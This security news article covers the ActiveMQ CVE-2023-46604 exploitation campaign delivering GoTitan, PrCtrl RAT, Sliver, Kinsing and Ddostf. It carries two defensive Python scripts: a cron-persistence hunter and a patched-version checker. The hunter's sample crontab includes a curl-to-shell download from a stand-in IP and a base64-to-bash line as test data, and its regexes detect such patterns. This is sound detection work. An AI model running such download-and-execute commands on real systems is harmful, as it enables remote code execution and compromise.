GoTitan Botnet and PrCtrl RAT Exploit Apache Vulnerability
Threat actors have been observed exploiting CVE-2023-46604, a critical vulnerability in Apache ActiveMQ.
Over the past few weeks, FortiGuard Labs identified multiple threat actors leveraging this vulnerability to deliver several malware strains.
Among the discoveries is GoTitan, a newly identified Golang-based botnet. It has raised concern because of its ability to distribute a range of other malware.
GoTitan is fetched from a malicious URL and targets x64 systems. Although still at an early stage of development, the malware copies itself on the host, gains persistence by registering a cron job, and collects basic information about the compromised endpoint.
A .NET program called PrCtrl RAT has also surfaced as a threat delivered through the ActiveMQ flaw. Built on the .NET framework, it provides remote control capabilities, allowing attackers to execute commands and potentially maintain a persistent presence on compromised systems.
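Cron registration of the kind described above is a generic persistence pattern, so a defender can hunt for it without knowing GoTitan's file names. The following Python is an added example, not FortiGuard's or the malware author's code: it parses user-crontab lines and flags commands that run from world-writable temp directories or hidden paths, pipe a downloader into a shell, or base64-decode a payload into a shell. The sample crontab, including the 203.0.113.7 address from the documentation range, is constructed for illustration; the page does not give GoTitan's real download URL or on-disk paths.

```python
"""Hunt for cron-based persistence in user-crontab-format text.

Added example, not code from the article or from any malware sample.
Handles the user crontab layout (five schedule fields or an @keyword,
then the command); /etc/crontab has an extra user column and would need
one more split. SAMPLE_CRONTAB is constructed, not a real capture.
"""
import re

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELL_RE = re.compile(r"\|\s*(?:ba|z|da)?sh\b")          # "| sh", "|bash", "| zsh" ...
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")
BASE64_RE = re.compile(r"\bbase64\b.*(?:-d\b|--decode\b)")
HIDDEN_PATH_RE = re.compile(r"/\.(?!\.?/)[^/\s]+/")     # "/tmp/.x/" but not "/../" or "/./"

SAMPLE_CRONTAB = """\
# constructed sample crontab, not a real capture
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/run >/dev/null 2>&1
@reboot curl -s http://203.0.113.7/a.sh | sh
30 2 * * 0 echo dGVzdA== | base64 -d | bash
"""


def parse_cron_line(line):
    """Return (schedule, command), or None for blanks, comments and VAR=value lines."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    first = stripped.split(None, 1)[0]
    if "=" in first and not first.startswith(("@", "*")):
        return None  # environment assignment such as PATH=/usr/bin
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = stripped.split(None, 5)
    if len(parts) < 6:
        return None  # malformed: fewer than five schedule fields plus a command
    return " ".join(parts[:5]), parts[5]


def classify_command(command):
    """Return the list of reasons a cron command looks like malware persistence."""
    reasons = []
    if any(d in command for d in TEMP_DIRS):
        reasons.append("runs from temp dir")
    if DOWNLOADER_RE.search(command) and SHELL_RE.search(command):
        reasons.append("download piped to shell")
    if BASE64_RE.search(command) and SHELL_RE.search(command):
        reasons.append("base64-decoded payload piped to shell")
    if HIDDEN_PATH_RE.search(command):
        reasons.append("hidden directory in path")
    return reasons


def suspicious_cron_entries(text):
    """Scan crontab text; return (line_no, schedule, command, reasons) for each hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = classify_command(command)
        if reasons:
            findings.append((lineno, schedule, command, reasons))
    return findings


if __name__ == "__main__":
    # On a live host feed it the output of `crontab -l` or the files
    # under /var/spool/cron and /etc/cron.d instead of the sample.
    for lineno, schedule, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: [{schedule}] {command}\n    {', '.join(reasons)}")
```

The heuristics are deliberately narrow so that the certbot-style entry in the sample is not flagged; extend TEMP_DIRS and the regexes to match your environment rather than loosening them globally.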
The researchers also found familiar malware and tooling in the ongoing exploitation. Sliver, an open-source framework built for penetration testing and red teaming, is being used by threat actors as a post-exploitation implant. It supports diverse callback protocols such as DNS, TCP and HTTP(S), which simplifies egress from compromised networks.
FortiGuard added that Kinsing, already an established cryptojacking operation, has once again demonstrated how quickly it adopts newly disclosed vulnerabilities.
Read more on these attacks: Flaw in Apache ActiveMQ Exposes Linux Systems to Kinsing Malware
The team also identified Ddostf, a malware strain with a track record dating back to 2016 that is still used to launch targeted Distributed Denial of Service (DDoS) attacks and is now being delivered through the same ActiveMQ flaw.
The advisory, published by Fortinet on Tuesday, stresses that threat actors continue to exploit CVE-2023-46604 despite a critical advisory from Apache and a patch issued more than a month earlier.
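Acting on the advisory means knowing which ActiveMQ builds on the estate still carry the flaw. The Python below is an added example (not Apache's or Fortinet's code) that decides whether a version string is affected by CVE-2023-46604, using the first fixed releases from Apache's advisory: 5.15.16, 5.16.7, 5.17.6 and 5.18.3. The jar names in SAMPLE_JARS are constructed; treating 6.x as unaffected, all 5.x branches older than 5.15 as unpatched, and pre-release builds of a fix version as still vulnerable are assumptions made here for a conservative audit.

```python
"""Classify Apache ActiveMQ versions against CVE-2023-46604.

Added example, not Apache's or FortiGuard's code. Fixed releases per the
Apache advisory: 5.15.16, 5.16.7, 5.17.6, 5.18.3. Everything below
5.15.16, including end-of-life 5.x branches and 4.x, is treated as
affected; 5.19+ and 6.x (assumed cut after the fix) are treated as clean.
SAMPLE_JARS is constructed.
"""
import re

FIRST_FIXED = {15: 16, 16: 7, 17: 6, 18: 3}   # 5.<minor> -> first patched patch level
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[-.]([0-9A-Za-z.-]+))?$")
JAR_RE = re.compile(
    r"activemq-(?:all|broker|client)-(\d+\.\d+\.\d+(?:-[0-9A-Za-z.]+)?)\.jar$"
)

SAMPLE_JARS = [                      # constructed directory listing of a broker's lib/
    "activemq-all-5.18.2.jar",
    "activemq-broker-5.18.3.jar",
    "activemq-client-5.16.7-SNAPSHOT.jar",
    "commons-io-2.11.0.jar",
]


def parse_version(text):
    """Split '5.18.3-SNAPSHOT' into (5, 18, 3, 'SNAPSHOT'); prerelease is None if absent."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    return major, minor, patch, m.group(4)


def is_vulnerable(text):
    """True if the version predates the fix for CVE-2023-46604 on its branch."""
    major, minor, patch, prerelease = parse_version(text)
    if major != 5:
        return major < 5            # 4.x never received the fix; 6.x assumed to post-date it
    if minor < 15:
        return True                 # end-of-life 5.x branches were not patched
    if minor > 18:
        return False                # 5.19+ branches assumed cut after the fix
    fixed = FIRST_FIXED[minor]
    if patch < fixed:
        return True
    if patch == fixed and prerelease:
        return True                 # a snapshot of the fix release may predate the fix commit
    return False


def version_from_jar(name):
    """Extract the version from an activemq-all/broker/client jar name, else None."""
    m = JAR_RE.search(name)
    return m.group(1) if m else None


def audit_jars(names):
    """Map each ActiveMQ jar name to 'vulnerable' or 'patched'; other jars are skipped."""
    verdicts = {}
    for name in names:
        version = version_from_jar(name)
        if version is None:
            continue
        verdicts[name] = "vulnerable" if is_vulnerable(version) else "patched"
    return verdicts


if __name__ == "__main__":
    # On a real broker, replace SAMPLE_JARS with os.listdir('<activemq>/lib').
    for name, verdict in audit_jars(SAMPLE_JARS).items():
        print(f"{verdict:10s} {name}")
```

The version string can also be read from the broker's web console banner or from `activemq --version`; the jar-name route is useful when the service is down or the console is firewalled off.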
“Users should remain vigilant against ongoing exploits by Sliver, Kinsing, and Ddostf,” reads the technical write-up. “It is crucial to prioritize system updates and patching and regularly monitor security advisories to effectively mitigate the risk of exploitation.”